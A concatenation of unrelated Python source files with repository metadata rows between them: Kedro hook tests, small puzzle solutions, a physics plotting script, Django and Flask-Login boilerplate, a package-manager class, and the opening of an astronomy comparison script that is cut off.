        load_setuptools_entrypoints = mocker.patch.object(
            hook_manager, "load_setuptools_entrypoints", return_value=num_plugins
        )
        distinfo = [("plugin_obj_1", MockDistInfo("test-project-a", "0.1"))]
        list_distinfo_mock = mocker.patch.object(
            hook_manager, "list_plugin_distinfo", return_value=distinfo
        )
        assert not hook_manager.is_registered(logging_hooks)
        # create the context
        _create_context_with_hooks(tmp_path, mocker, [logging_hooks])
        # assert hooks are registered after context is created
        assert hook_manager.is_registered(logging_hooks)
        load_setuptools_entrypoints.assert_called_once_with("kedro.hooks")
        list_distinfo_mock.assert_called_once_with()
        if num_plugins:
            log_messages = [record.getMessage() for record in caplog.records]
            plugin = f"{distinfo[0][1].project_name}-{distinfo[0][1].version}"
            expected_msg = (
                f"Registered hooks from {num_plugins} installed plugin(s): {plugin}"
            )
            assert expected_msg in log_messages
    def test_disabling_auto_discovered_hooks(
        self, tmp_path, mocker, hook_manager, caplog
    ):
        """Plugins listed in disable_hooks_for_plugins are unregistered and
        reported as disabled."""
        mocker.patch.object(hook_manager, "load_setuptools_entrypoints", return_value=2)
        distinfo = [
            ("plugin_obj_1", MockDistInfo("test-project-a", "0.1")),
            ("plugin_obj_2", MockDistInfo("test-project-b", "0.2")),
        ]
        list_distinfo_mock = mocker.patch.object(
            hook_manager, "list_plugin_distinfo", return_value=distinfo
        )
        unregister_mock = mocker.patch.object(hook_manager, "unregister")
        # create the context
        _create_context_with_hooks(tmp_path, mocker, [], [distinfo[0][1].project_name])
        list_distinfo_mock.assert_called_once_with()
        unregister_mock.assert_called_once_with(plugin=distinfo[0][0])
        log_messages = [record.getMessage() for record in caplog.records]
        plugin = f"{distinfo[1][1].project_name}-{distinfo[1][1].version}"
        expected_msg = f"Registered hooks from 1 installed plugin(s): {plugin}"
        assert expected_msg in log_messages
        plugin = f"{distinfo[0][1].project_name}-{distinfo[0][1].version}"
        expected_msg = f"Hooks are disabled for plugin(s): {plugin}"
        assert expected_msg in log_messages
    def test_after_catalog_created_hook_is_called(self, context_with_hooks, caplog):
        """The hook receives the catalog plus the config it was built from."""
        catalog = context_with_hooks.catalog
        config_loader = context_with_hooks.config_loader
        relevant_records = [
            r
            for r in caplog.records
            if r.name == LoggingHooks.handler_name
            and r.getMessage() == "Catalog created"
        ]
        assert len(relevant_records) == 1
        record = relevant_records[0]
        assert record.catalog == catalog
        assert record.conf_creds == config_loader.get("credentials*")
        assert record.conf_catalog == _convert_paths_to_absolute_posix(
            project_path=context_with_hooks.project_path,
            conf_dictionary=config_loader.get("catalog*"),
        )
        assert record.save_version is None
        assert record.load_versions is None
        assert record.run_id == "mocked context with hooks run id"
    def test_before_and_after_pipeline_run_hooks_are_called(
        self, context_with_hooks, dummy_dataframe, caplog
    ):
        context_with_hooks.catalog.save("cars", dummy_dataframe)
        context_with_hooks.catalog.save("boats", dummy_dataframe)
        context_with_hooks.run()
        # test before pipeline run hook
        before_pipeline_run_calls = [
            record
            for record in caplog.records
            if record.funcName == "before_pipeline_run"
        ]
        assert len(before_pipeline_run_calls) == 1
        call_record = before_pipeline_run_calls[0]
        assert call_record.pipeline.describe() == context_with_hooks.pipeline.describe()
        _assert_hook_call_record_has_expected_parameters(
            call_record, ["pipeline", "catalog", "run_params"]
        )
        # test after pipeline run hook
        after_pipeline_run_calls = [
            record
            for record in caplog.records
            if record.funcName == "after_pipeline_run"
        ]
        assert len(after_pipeline_run_calls) == 1
        call_record = after_pipeline_run_calls[0]
        _assert_hook_call_record_has_expected_parameters(
            call_record, ["pipeline", "catalog", "run_params"]
        )
        assert call_record.pipeline.describe() == context_with_hooks.pipeline.describe()
    def test_on_pipeline_error_hook_is_called(self, broken_context_with_hooks, caplog):
        with pytest.raises(ValueError, match="broken"):
            broken_context_with_hooks.run()
        on_pipeline_error_calls = [
            record
            for record in caplog.records
            if record.funcName == "on_pipeline_error"
        ]
        assert len(on_pipeline_error_calls) == 1
        call_record = on_pipeline_error_calls[0]
        _assert_hook_call_record_has_expected_parameters(
            call_record, ["error", "run_params", "pipeline", "catalog"]
        )
        expected_error = ValueError("broken")
        assert_exceptions_equal(call_record.error, expected_error)
    def test_on_node_error_hook_is_called_with_sequential_runner(
        self, broken_context_with_hooks, caplog
    ):
        with pytest.raises(ValueError, match="broken"):
            broken_context_with_hooks.run(node_names=["node1"])
        on_node_error_calls = [
            record for record in caplog.records if record.funcName == "on_node_error"
        ]
        assert len(on_node_error_calls) == 1
        call_record = on_node_error_calls[0]
        _assert_hook_call_record_has_expected_parameters(
            call_record, ["error", "node", "catalog", "inputs", "is_async", "run_id"]
        )
        expected_error = ValueError("broken")
        assert_exceptions_equal(call_record.error, expected_error)
    def test_before_and_after_node_run_hooks_are_called_with_sequential_runner(
        self, context_with_hooks, dummy_dataframe, caplog
    ):
        context_with_hooks.catalog.save("cars", dummy_dataframe)
        context_with_hooks.run(node_names=["node1"])
        # test before node run hook
        before_node_run_calls = [
            record for record in caplog.records if record.funcName == "before_node_run"
        ]
        assert len(before_node_run_calls) == 1
        call_record = before_node_run_calls[0]
        _assert_hook_call_record_has_expected_parameters(
            call_record, ["node", "catalog", "inputs", "is_async", "run_id"]
        )
        # sanity check a couple of important parameters
        assert call_record.inputs["cars"].to_dict() == dummy_dataframe.to_dict()
        assert call_record.run_id == context_with_hooks.run_id
        # test after node run hook
        after_node_run_calls = [
            record for record in caplog.records if record.funcName == "after_node_run"
        ]
        assert len(after_node_run_calls) == 1
        call_record = after_node_run_calls[0]
        _assert_hook_call_record_has_expected_parameters(
            call_record, ["node", "catalog", "inputs", "outputs", "is_async", "run_id"]
        )
        # sanity check a couple of important parameters
        assert call_record.outputs["planes"].to_dict() == dummy_dataframe.to_dict()
        assert call_record.run_id == context_with_hooks.run_id
    @pytest.mark.skipif(
        sys.platform.startswith("win"), reason="Due to bug in parallel runner"
    )
    def test_on_node_error_hook_is_called_with_parallel_runner(
        self, tmp_path, mocker, logging_hooks
    ):
        # Records are collected via the multiprocessing queue because the
        # hooks fire in worker processes under ParallelRunner.
        log_records = []
        class LogHandler(logging.Handler): # pylint: disable=abstract-method
            def handle(self, record):
                log_records.append(record)
        broken_context_with_hooks = _create_broken_context_with_hooks(
            tmp_path, mocker, [logging_hooks]
        )
        mocker.patch(
            "kedro.framework.context.context.load_context",
            return_value=broken_context_with_hooks,
        )
        logs_queue_listener = QueueListener(logging_hooks.queue, LogHandler())
        logs_queue_listener.start()
        with pytest.raises(ValueError, match="broken"):
            broken_context_with_hooks.run(
                runner=ParallelRunner(max_workers=2), node_names=["node1", "node2"]
            )
        logs_queue_listener.stop()
        on_node_error_records = [
            r for r in log_records if r.funcName == "on_node_error"
        ]
        assert len(on_node_error_records) == 2
        for call_record in on_node_error_records:
            _assert_hook_call_record_has_expected_parameters(
                call_record,
                ["error", "node", "catalog", "inputs", "is_async", "run_id"],
            )
            expected_error = ValueError("broken")
            assert_exceptions_equal(call_record.error, expected_error)
    @pytest.mark.skipif(
        sys.platform.startswith("win"), reason="Due to bug in parallel runner"
    )
    def test_before_and_after_node_run_hooks_are_called_with_parallel_runner(
        self, tmp_path, mocker, logging_hooks, dummy_dataframe
    ):
        # Records are collected via the multiprocessing queue because the
        # hooks fire in worker processes under ParallelRunner.
        log_records = []
        class LogHandler(logging.Handler): # pylint: disable=abstract-method
            def handle(self, record):
                log_records.append(record)
        context_with_hooks = _create_context_with_hooks(
            tmp_path, mocker, [logging_hooks]
        )
        mocker.patch(
            "kedro.framework.context.context.load_context",
            return_value=context_with_hooks,
        )
        logs_queue_listener = QueueListener(logging_hooks.queue, LogHandler())
        logs_queue_listener.start()
        context_with_hooks.catalog.save("cars", dummy_dataframe)
        context_with_hooks.catalog.save("boats", dummy_dataframe)
        context_with_hooks.run(runner=ParallelRunner(), node_names=["node1", "node2"])
        logs_queue_listener.stop()
        before_node_run_log_records = [
            r for r in log_records if r.funcName == "before_node_run"
        ]
        assert len(before_node_run_log_records) == 2
        for record in before_node_run_log_records:
            assert record.getMessage() == "About to run node"
            assert record.node.name in ["node1", "node2"]
            assert set(record.inputs.keys()) <= {"cars", "boats"}
        after_node_run_log_records = [
            r for r in log_records if r.funcName == "after_node_run"
        ]
        assert len(after_node_run_log_records) == 2
        for record in after_node_run_log_records:
            assert record.getMessage() == "Ran node"
            assert record.node.name in ["node1", "node2"]
            assert set(record.outputs.keys()) <= {"planes", "ships"}
class TestRegistrationHooks:
    """Tests for the registration hooks: register_pipelines,
    register_config_loader and register_catalog."""
    def test_register_pipelines_is_called(
        self, context_with_hooks, dummy_dataframe, caplog
    ):
        context_with_hooks.catalog.save("cars", dummy_dataframe)
        context_with_hooks.catalog.save("boats", dummy_dataframe)
        context_with_hooks.run()
        register_pipelines_calls = [
            record
            for record in caplog.records
            if record.funcName == "register_pipelines"
        ]
        assert len(register_pipelines_calls) == 1
        call_record = register_pipelines_calls[0]
        _assert_hook_call_record_has_expected_parameters(call_record, [])
        expected_pipelines = {"__default__": context_pipeline, "de": context_pipeline}
        assert context_with_hooks.pipelines == expected_pipelines
    def test_register_pipelines_with_duplicate_entries(
        self, context_with_duplicate_hooks, dummy_dataframe
    ):
        """Colliding pipeline keys trigger a UserWarning; later hooks win."""
        context_with_duplicate_hooks.catalog.save("cars", dummy_dataframe)
        context_with_duplicate_hooks.catalog.save("boats", dummy_dataframe)
        pattern = "Found duplicate pipeline entries. The following will be overwritten: __default__"
        with pytest.warns(UserWarning, match=re.escape(pattern)):
            context_with_duplicate_hooks.run()
        # check that all pipeline dictionaries merged together correctly
        expected_pipelines = {
            key: context_pipeline for key in ("__default__", "de", "pipe")
        }
        assert context_with_duplicate_hooks.pipelines == expected_pipelines
    def test_register_config_loader_is_called(self, context_with_hooks, caplog):
        _ = context_with_hooks.config_loader
        relevant_records = [
            r for r in caplog.records if r.name == LoggingHooks.handler_name
        ]
        assert len(relevant_records) == 1
        record = relevant_records[0]
        assert record.getMessage() == "Registering config loader"
        # The hook is given base and local conf paths, in that order.
        expected_conf_paths = [
            str(
                context_with_hooks.project_path / context_with_hooks.CONF_ROOT / "base"
            ),
            str(
                context_with_hooks.project_path / context_with_hooks.CONF_ROOT / "local"
            ),
        ]
        assert record.conf_paths == expected_conf_paths
    def test_register_catalog_is_called(self, context_with_hooks, caplog):
        catalog = context_with_hooks.catalog
        assert isinstance(catalog, DataCatalog)
        relevant_records = [
            r
            for r in caplog.records
            if r.name == LoggingHooks.handler_name
            and r.getMessage() == "Registering catalog"
        ]
        assert len(relevant_records) == 1
        record = relevant_records[0]
        assert record.catalog.keys() == {"cars", "boats"}
        assert record.credentials == {"dev_s3": "foo"}
        # save_version is only passed during a run, not on the property getter
        assert record.save_version is None
        assert record.load_versions is None
        assert record.journal is None
| [
"noreply@github.com"
] | kiminh.noreply@github.com |
da46a7bd47b78c6f73bfb13edface03d1800cba5 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /z5zpTucxpMLL72FCx_5.py | 707b3eb2d9448862618c21c90f1fd45b21c4bcb1 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 502 | py | """
Write a function to return the city from each of these vacation spots.
### Examples
grab_city("[Last Day!] Beer Festival [Munich]") ➞ "Munich"
grab_city("Cheese Factory Tour [Portland]") ➞ "Portland"
grab_city("[50% Off!][Group Tours Included] 5-Day Trip to Onsen [Kyoto]") ➞ "Kyoto"
### Notes
There may be additional brackets, but the city will always be in the last
bracket pair.
"""
import re
def grab_city(txt):
    """Return the city: the contents of the last [bracket] pair in *txt*."""
    bracketed = re.findall(r'\[(.*?)\]', txt)
    return bracketed[-1]
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
f1910980479f11c5206314612413a19bd533f2d5 | 30f6a276dc667ff8910dd442ddcd7d21198aef58 | /Helicons in Metals/varying_freq_analysis.py | ceb8f7d9db3dd4a1de03630827bd50adf22e6a8e | [] | no_license | ericyeung/PHY424 | 5ddef3b8e95ad253e064736c6da653c7bc260435 | 200ebbed21abbeee5b3e313adfe307d3d7c2068c | refs/heads/master | 2021-05-04T11:46:34.979089 | 2016-08-21T18:37:05 | 2016-08-21T18:37:27 | 49,386,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,705 | py | #!/usr/bin/env python
from __future__ import division
from math import *
import matplotlib.pyplot as plt
import numpy as np
from varying_freq_data import *
"""
Plots the resonances
Last updated: November 9
"""
__author__ = "Eric Yeung"
# --- Resonance scan at the highest field (B = 8436.65 G) ---
plt.plot(frequency26, pickup26)
plt.errorbar(frequency26, pickup26, ferror26, perror26, fmt='b+', color = 'r')
plt.xlabel('Frequency (Hz)')
plt.ylabel('Amplitude (V)')
#plt.title('For B = 8436.65 G')
# Label the N = 1 and N = 3 resonances; the "+ 40" offsets lift the label box above the peak.
plt.annotate('N = 1', xy=(321, 188.92 + 40), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.annotate('N = 3', xy=(2730, 326.2 + 40), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.show()
# --- Resonance scan at B = 5191.79 G ---
plt.plot(frequency16, pickup16)
plt.errorbar(frequency16, pickup16, ferror16, perror16, fmt = 'b+', color = 'r')
# Print the index and frequency of the maximum pickup; flagged by the author as a possible outlier.
print np.argmax(pickup16), frequency16[np.argmax(pickup16)] # Outlier?
plt.xlabel('Frequency (Hz)')
plt.ylabel('Amplitude (V)')
#plt.title('For B = 5191.79 G')
plt.annotate('N = 1', xy=(203 + 130, 88.52 + 30), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.annotate('N = 3', xy=(1800, 195.76 + 30), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.show()
# --- Resonance scan at the lowest field (B = 3244.87 G) ---
plt.plot(frequency10, pickup10)
plt.errorbar(frequency10, pickup10, ferror10, perror10, fmt = 'b+', color = 'r')
plt.xlabel('Frequency (Hz)')
plt.ylabel('Amplitude (V)')
#plt.title('For B = 3244.87 G')
plt.annotate('N = 1', xy=(136, 43.12 + 15), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.annotate('N = 3', xy=(1100 - 20, 115.75 + 20), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.show()
####################################################################################
# --- Overlay of all three fields, zoomed on the N = 1 resonance region (0-1000 Hz) ---
plt.plot(frequency26, pickup26, color = 'g', label = 'B = 8436.65 G')
plt.errorbar(frequency26, pickup26, ferror26, perror26, fmt='b+', color = 'r')
plt.plot(frequency16, pickup16, color = 'b', label ='B = 5191.79 G')
plt.errorbar(frequency16, pickup16, ferror16, perror16, fmt = 'b+', color = 'black')
plt.plot(frequency10, pickup10, color = 'maroon', label = 'B = 3244.87 G')
plt.errorbar(frequency10, pickup10, ferror10, perror10, fmt = 'b+', color = 'dodgerblue')
plt.xlim([0, 1000])
plt.ylim([0, 250])
freq_ticks = np.arange(0, 1100, 100)
freq_labels = freq_ticks
plt.xlabel('Frequency (Hz)')
plt.xticks(freq_ticks, freq_labels)
plt.ylabel('Amplitude (V)')
#plt.title('n$ = 1$ resonances for Various Magnetic Fields')
plt.legend().draggable()
#plt.savefig('N1_resonance_plot.png', format='png', dpi=1200)
plt.show()
# Standard deviation of the sampled frequencies for each field (rough scan-width comparison).
print np.std(frequency26), np.std(frequency16), np.std(frequency10)
| [
"irq.ericyeung@hotmail.com"
] | irq.ericyeung@hotmail.com |
75d11f63a91f6acbedc0504480a733cffdc0e729 | 526b892fa981573f26d55c361b42a9d3fa841db5 | /haas/manage.py | 02a9c9675961e00ed03095bbba46c2c1c4dccfff | [
"BSD-2-Clause",
"BSD-3-Clause"
] | permissive | uranusjr/bbshighlighter | 13d89713245f95906a733b7aa8e7c39c58f6ec22 | da35d483e429e0cbd0619b1bc399f4fe67de9ac3 | refs/heads/master | 2020-05-31T22:36:58.424739 | 2014-03-07T17:24:00 | 2014-03-07T17:24:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 283 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
if __name__ == "__main__":
    # Fall back to the production settings module unless the environment
    # already specifies one.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "haas.settings.production")
    from django.core.management import execute_from_command_line
    # Hand the CLI arguments straight to Django's command dispatcher.
    execute_from_command_line(sys.argv)
| [
"uranusjr@gmail.com"
] | uranusjr@gmail.com |
fe25109d046615a0e7e11fb729ba22f26a636fe0 | 3373b2bbe6303dcee3ae7f7f3e715ce674878a7b | /nusoft/package_manager.py | d0fc233a89c3d06f5f4f8f57f886bcfd64b7e5b7 | [
"MIT"
] | permissive | pgjones/nusoft | f3515a6e2fc90622638cde0b8712ba6fcea2aa8e | 442c7bca2f921892ecf9eb3ff6821e2a9da7b156 | refs/heads/master | 2020-09-12T21:44:54.453633 | 2014-10-03T20:22:09 | 2014-10-03T20:22:09 | 17,223,474 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,243 | py | #!/usr/bin/env python
#
# PackageManager
#
# Manages the packages on the system, installs, removes and updates.
#
# Author P G Jones - 2014-02-08 <p.g.jones@qmul.ac.uk> : First revision
####################################################################################################
import types
import logging
logger = logging.getLogger(__name__)

class PackageManager(object):
    """ Manages a dictionary of packages for installation on the system.

    Packages are duck typed: any object providing get_name, get_repository,
    get_dependencies, set_dependencies, check_state, is_installed, install,
    update and remove can be managed.

    :param _packages: packages keyed by package name
    :type _packages: dictionary string and :class:`nusoft.package`
    """
    def __init__(self):
        """ Initialise with an empty package registry."""
        self._packages = {}
    def register_package(self, package):
        """ Register a *package* in this manager

        If a package of the same name is already registered it is replaced
        and a warning naming both repositories is logged.

        :param package: package to register
        :type package: :class:`package.package.Package` instance
        """
        logger.debug("Registering %s package" % package.get_name())
        if package.get_name() in self._packages:
            # Fixed: previously indexed the registry with the package *instance*
            # (keys are names, so this raised KeyError) and logged names where
            # repositories were intended.  logger.warn is deprecated.
            logger.warning("Package %s already registered, replacing package from %s with package from %s." %
                           (package.get_name(),
                            self._packages[package.get_name()].get_repository(),
                            package.get_repository()))
        package.check_state()
        self._packages[package.get_name()] = package
    def packages(self):
        """ Yields a package name, package instance tuple.

        :return: tuple name and :class:`package.package.Package` instance
        """
        for package_name in self._packages:
            yield (package_name, self._packages[package_name])
    def get_package(self, package_name):
        """ Return the package with a name equal to *package_name*

        :param package_name: name of the package
        :return: the installed package
        :rtype: :class:`nusoft.package.Package` instance
        :raises KeyError: if no package with that name is registered
        """
        try:
            return self._packages[package_name]
        except KeyError:
            logger.exception("Package %s does not exist" % package_name, exc_info=True)
            raise
    ####################################################################################################
    # Functions that act on all packages
    def install_all(self):
        """ Install all registered packages that are not yet installed."""
        logger.info("Installing all packages")
        # Fixed: previously iterated over dict *keys* (package names) and then
        # called package methods on the strings.
        for package in self._packages.values():
            if not package.is_installed():
                self._install_package(package)
    def update_all(self):
        """ Update all installed packages."""
        logger.info("Updating all packages")
        for package in self._packages.values():
            # Fixed: the condition was inverted (it tried to update packages
            # that were *not* installed).
            if package.is_installed():
                self._update_package(package)
    def remove_all(self):
        """ Remove all installed packages."""
        logger.info("Removing all packages")
        for package in self._packages.values():
            # Fixed: the condition was inverted (it tried to remove packages
            # that were *not* installed).
            if package.is_installed():
                self._remove_package(package, True) # Force remove
    ####################################################################################################
    # Functions that act on single packages
    def install_package_dependencies(self, package_name):
        """ Install the dependencies of the package with name equal to *package_name*

        :param package_name: name of the package of which dependencies should be installed
        :return: installed dependencies keyed by dependency name
        :rtype: dict
        """
        package = self.get_package(package_name)
        return self._install_package_dependencies(package)
    def install_package(self, package_name):
        """ Install the package with a name equal to *package_name*

        :param package_name: name of the package to install
        :return: the installed package
        :rtype: :class:`nusoft.package.Package` instance
        """
        package = self.get_package(package_name)
        return self._install_package(package)
    def update_package(self, package_name):
        """ Update the package with a name equal to *package_name*

        :param package_name: name of the package to update
        :return: the installed package
        :rtype: :class:`nusoft.package.Package` instance
        """
        package = self.get_package(package_name)
        return self._update_package(package)
    def remove_package(self, package_name, force=False):
        """ Remove the package with a name equal to *package_name*

        This will check if the package has dependents and not remove if it does,
        unless *force* is True.

        :param package_name: name of the package to remove
        """
        package = self.get_package(package_name)
        return self._remove_package(package, force)
    ####################################################################################################
    # Internal functions
    def _install_package_dependencies(self, package):
        """ Install the dependencies of the package

        :param package: package whose dependencies should be installed
        :type package: :class:`nusoft.package.Package` instance
        :return: installed dependencies keyed by dependency name
        :rtype: dict
        """
        installed_dependencies = {}
        for dependency_name in package.get_dependencies():
            # A list entry means "any one of these optional dependencies".
            # Fixed: the isinstance check used types.ListType, which does not
            # exist on Python 3; plain ``list`` works on both 2 and 3.
            if isinstance(dependency_name, list): # Multiple optional dependencies
                for optional_dependency_name in dependency_name:
                    optional_dependency = self.get_package(optional_dependency_name)
                    if optional_dependency.is_installed(): # Great found one!
                        installed_dependencies[optional_dependency_name] = optional_dependency
                        break
                else: # No optional dependency is installed, thus install the first
                    dependency = self.get_package(dependency_name[0])
                    installed_dependencies[dependency_name[0]] = self._install_package(dependency)
            else: # Just a single dependency
                dependency = self.get_package(dependency_name)
                if dependency.is_installed():
                    installed_dependencies[dependency_name] = dependency
                else: # Must install it
                    installed_dependencies[dependency_name] = self._install_package(dependency)
        return installed_dependencies
    def _install_package(self, package):
        """ Install the package (and, recursively, its dependencies)

        :param package: package to install
        :types package: :class:`nusoft.package.Package` instance
        :return: the installed package
        :rtype: :class:`nusoft.package.Package` instance
        :raises Exception: if the package's own install step fails
        """
        if package.is_installed():
            return package
        dependencies = self._install_package_dependencies(package)
        package.set_dependencies(dependencies)
        try:
            package.install()
        except Exception:
            logger.exception("Installation fail.", exc_info=True)
            raise Exception("Failed to install " + package.get_name() + " see log for details")
        package.check_state()
        return package
    def _update_package(self, package):
        """ Update the package, then cascade the update to its dependents

        :param package: package to update
        :type package: :class:`nusoft.package.Package` instance
        :return: the installed package
        :rtype: :class:`nusoft.package.Package` instance
        :raises Exception: if the package is not installed
        """
        if not package.is_installed():
            # Fixed: a bare ``raise`` with no active exception is itself an
            # error; raise an informative exception instead.
            raise Exception("Package %s is not installed." % package.get_name())
        dependencies = self._install_package_dependencies(package)
        package.set_dependencies(dependencies)
        package.update()
        package.check_state()
        for dependent in self._package_dependents(package):
            self._update_package(dependent)
        return package
    def _remove_package(self, package, force):
        """ Remove the *package*

        This will check if the package has dependents and not remove if it
        does, unless *force* is True.

        :param package: package to remove
        :raises Exception: if the package is not installed, or it has
            dependents and *force* is False
        """
        if not package.is_installed():
            raise Exception("Package is not installed.")
        if force:
            package.remove()
        else:
            if len(self._package_dependents(package)) == 0:
                package.remove()
            else:
                raise Exception("Package has dependents.")
    def _package_dependents(self, package):
        """ Return the packages that are dependent on *package*

        :param package: package to find dependent packages for
        :type package: :class:`nusoft.package.Package` instance
        :return: list of dependent packages
        :rtype: list of :class:`nusoft.package.Package` instances
        """
        dependents = []
        for test_name in self._packages:
            test_package = self._packages[test_name]
            # If the test package lists this package (directly or as one of a
            # group of optional dependencies) it counts as a dependent.
            for dependency in test_package.get_dependencies():
                if isinstance(dependency, list): # deal with optional dependencies
                    if package.get_name() in dependency:
                        dependents.append(test_package)
                elif dependency == package.get_name():
                    dependents.append(test_package)
        return dependents
| [
"p.g.jones@qmul.ac.uk"
] | p.g.jones@qmul.ac.uk |
b5503e5ac0863cea991c31606c9d661a6930e00b | 56f1bb713f0651ac63391349deb81790df14e4b5 | /Pet/pet.py | 53de7eb4272d2f2fdb482b88cb1747a7b250ad3a | [
"CC0-1.0"
] | permissive | rajitbanerjee/kattis | 4cd46a2fe335120b8f53ca71544fc0681474118b | 3a5dd4c84c07e21f09ef45ebd9c1bad2a0adc6ad | refs/heads/master | 2022-05-05T03:19:28.744660 | 2020-08-12T18:48:55 | 2020-08-12T18:48:55 | 192,208,120 | 4 | 2 | CC0-1.0 | 2022-04-15T05:50:16 | 2019-06-16T15:38:15 | Python | UTF-8 | Python | false | false | 227 | py | """https://open.kattis.com/problems/pet"""
def solve(rows):
    """Return (1-based index of the highest-scoring contestant, their total).

    ``rows`` is an iterable of five per-contestant score lists.  Ties go to
    the first contestant with the maximal total (``list.index`` semantics),
    matching the original script's behaviour.
    """
    totals = [sum(row) for row in rows]
    best = max(totals)
    return totals.index(best) + 1, best


def main():
    """Read five lines of whitespace-separated integers from stdin and
    print the winning contestant's number and points."""
    rows = [list(map(int, input().split())) for _ in range(5)]
    winner, points = solve(rows)
    print(winner, points)


if __name__ == '__main__':
    # Guarded so the module can be imported (e.g. for testing) without
    # consuming stdin; behaviour when run as a script is unchanged.
    main()
"rajit.banerjee@ucdconnect.ie"
] | rajit.banerjee@ucdconnect.ie |
860e8cfb6adb792ded6055048d9bc968e99326b1 | c9f67529e10eb85195126cfa9ada2e80a834d373 | /bin/pycodestyle | df2ddc1147f5cce9be2a239439bea29ab02444b8 | [
"Apache-2.0"
] | permissive | chilung/dllab-5-1-ngraph | 10d6df73ea421bfaf998e73e514972d0cbe5be13 | 2af28db42d9dc2586396b6f38d02977cac0902a6 | refs/heads/master | 2022-12-17T19:14:46.848661 | 2019-01-14T12:27:07 | 2019-01-14T12:27:07 | 165,513,937 | 0 | 1 | Apache-2.0 | 2022-12-08T04:59:31 | 2019-01-13T14:19:16 | Python | UTF-8 | Python | false | false | 255 | #!/home/ccma/n1p1/home/ccma/Chilung/lab5-venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pycodestyle import _main
if __name__ == '__main__':
    # Console-script shim: strip any '-script.py(w)'/'.exe' suffix from
    # argv[0] (artefacts of the Windows script launcher) so pycodestyle
    # reports a clean program name, then delegate to its CLI entry point.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(_main())
| [
"chilung.cs06g@nctu.edu.tw"
] | chilung.cs06g@nctu.edu.tw | |
721cec5d08493be8d4487e275ec3dac5977eeea6 | fbd4ecf7046171c4e96267c5982c964db54578f5 | /start code/src/Customer.py | 5e8cda2dc0acb09e187f3585b986fb294ad215a5 | [] | no_license | Alvin2580du/alvin_py | 6dddcfbfae214694e9f3dafd976101e681f2a66d | 82d3e9808073f2145b039ccf464c526cb85274e3 | refs/heads/master | 2021-05-05T16:01:43.544783 | 2019-10-29T02:23:59 | 2019-10-29T02:23:59 | 117,328,713 | 12 | 2 | null | 2021-03-20T00:06:37 | 2018-01-13T08:51:49 | Python | UTF-8 | Python | false | false | 1,279 | py | from flask_login import UserMixin
from abc import ABC, abstractmethod
class User(UserMixin, ABC):
    """Abstract base for application accounts, providing the properties
    Flask-Login expects.  Subclasses must implement :meth:`is_admin`.
    """
    # Class-wide counter used to hand out sequential ids; starts at -1 so
    # the first user receives id 0.  (Name-mangled to _User__id.)
    __id = -1
    def __init__(self, username, password):
        # NOTE(review): the password is stored and compared in plain text —
        # consider hashing before production use.
        self._id = self._generate_id()
        self._username = username
        self._password = password
    @property
    def username(self):
        """The account's login name (read-only)."""
        return self._username
    @property
    def is_authenticated(self):
        """Flask-Login: every constructed user counts as authenticated."""
        return True
    @property
    def is_active(self):
        """Flask-Login: accounts are always active (no deactivation here)."""
        return True
    @property
    def is_anonymous(self):
        """Flask-Login: these are real, non-anonymous users."""
        return False
    def get_id(self):
        """Required by Flask-login"""
        return str(self._id)
    def _generate_id(self):
        """Return the next sequential id, shared across all User subclasses."""
        User.__id += 1
        return User.__id
    def validate_password(self, password):
        """Return True if *password* matches the stored password."""
        return self._password == password
    @abstractmethod
    def is_admin(self):
        """Return whether this account has administrative rights."""
        pass
class Customer(User):
    """A non-administrative account tied to a driving licence."""

    def __init__(self, username, password, licence):
        super().__init__(username, password)
        self._licence = licence

    def __str__(self):
        return f'Customer <name: {self._username}, licence: {self._licence}>'

    def is_admin(self):
        """Customers never have administrative rights."""
        return False
class Admin(User):
    """An administrative account."""

    def __str__(self):
        return f'Admin <name: {self._username}>'

    def is_admin(self):
        """Admins always have administrative rights."""
        return True
| [
"ypducdtu@163.com"
] | ypducdtu@163.com |
8829126941188052375e680fa9fb5c24cf8b972b | 17ca5bae91148b5e155e18e6d758f77ab402046d | /Comparsion/compare_Federica_SED_data/compare_result.py | c3a371fd9726be0f5a55285fd4ac2f393152474a | [] | no_license | dartoon/QSO_decomposition | 5b645c298825091c072778addfaab5d3fb0b5916 | a514b9a0ad6ba45dc9c3f83abf569688b9cf3a15 | refs/heads/master | 2021-12-22T19:15:53.937019 | 2021-12-16T02:07:18 | 2021-12-16T02:07:18 | 123,425,150 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,456 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu May 9 14:00:30 2019
@author: Dartoon
Comparing the fitting between Xuheng and Federica
"""
import numpy as np
import astropy.io.fits as pyfits
import matplotlib.pyplot as plt
import sys
sys.path.insert(0,'../../py_tools')
from load_result import load_host_p, load_err
# Sample IDs common to both analyses.
ID = ['CID1174', 'CID1281', 'CID206', 'CID216', 'CID237', 'CID255', 'CID3242',
'CID3570', 'CID452', 'CID454', 'CID50', 'CID543', 'CID597', 'CID607',
'CID70', 'LID1273', 'LID1538', 'LID360', 'XID2138', 'XID2202', 'XID2396',
'CDFS-1', 'CDFS-229', 'CDFS-321', 'CDFS-724', 'ECDFS-358', 'SXDS-X1136',
